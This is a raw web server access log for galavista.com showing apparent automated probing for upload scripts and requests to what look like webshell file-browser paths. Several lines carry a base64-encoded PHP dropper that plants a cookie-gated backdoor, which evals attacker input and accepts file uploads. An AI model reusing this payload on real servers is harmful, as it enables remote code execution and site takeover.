216.73.216.189 - - [01/Dec/2025:18:56:54 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fdoc.php&path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 4395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:56:54 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2F29b99%2Fdoc.php&path=%2Fhome%2Fi442524%2Fpublic_html%2F29b99 HTTP/1.1" 200 4404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.112.223.135 - - [01/Dec/2025:18:57:55 +0000] "GET / HTTP/1.1" 200 1493 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2783.99 Safari/537.36"
37.112.223.135 - - [01/Dec/2025:18:57:55 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2783.99 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:18:59:32 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fce685 HTTP/1.1" 200 887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:18:29:20 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [01/Dec/2025:18:29:20 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [01/Dec/2025:18:39:18 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.71 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:18:39:19 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.71 Safari/537.36"
170.106.160.90 - - [01/Dec/2025:18:48:20 +0000] "GET /assets/images/?ND HTTP/1.1" 200 872 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.186.131.59 - - [01/Dec/2025:18:48:27 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2935.28 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:18:48:28 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2935.28 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:18:56:54 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fdoc.php&path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 4394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.112.223.135 - - [01/Dec/2025:18:57:56 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2783.99 Safari/537.36"
37.112.223.135 - - [01/Dec/2025:18:57:57 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2783.99 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:18:59:32 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 5710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:19:07:16 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
43.159.144.16 - - [01/Dec/2025:19:14:25 +0000] "GET /1d2be/?NA HTTP/1.1" 200 752 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.186.131.59 - - [01/Dec/2025:19:15:15 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:19:15:39 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:19:15:40 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:19:15:40 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
194.68.32.135 - - [01/Dec/2025:19:25:09 +0000] "GET / HTTP/1.1" 200 1492 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2692.17 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:19:25:14 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2692.17 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:19:25:28 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2692.17 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:19:25:33 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2692.17 Safari/537.36"
43.131.253.14 - - [01/Dec/2025:19:25:57 +0000] "GET /d4fae/?path=/home/.. HTTP/1.1" 200 2277 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.73.216.189 - - [01/Dec/2025:19:26:13 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fwww HTTP/1.1" 200 1927 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
